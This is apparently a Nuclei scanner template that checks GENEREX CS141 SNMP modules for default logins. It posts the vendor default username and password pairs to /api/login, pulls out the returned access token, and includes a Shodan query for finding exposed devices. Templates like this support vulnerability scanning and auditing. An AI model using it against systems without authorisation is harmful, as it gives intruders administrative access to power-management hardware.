id: cs141-default-login

info:
  name: CS141 SNMP Module Default Login
  author: socketz
  severity: medium
  reference: https://www.generex.de/media/pages/packages/documents/manuals/f65348d5b6-1628841637/manual_CS141_en.pdf
  tags: hiawatha,iot,default-login
  metadata:
    shodan-query: https://www.shodan.io/search?query=html%3A%22CS141%22

requests:
  - raw:
      - |
        POST /api/login HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/plain, */*
        Content-Type: application/json

        {"userName":"{{user}}","password":"{{pass}}"}

    attack: pitchfork
    payloads:
      user:
        - admin
        - engineer
        - guest
      pass:
        - cs141-snmp
        - engineer
        - guest

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'accessToken'
          - 'application/json'
        condition: and
        part: header

      - type: status
        status:
          - 200

    extractors:
      - type: kval
        kval:
          - accessToken
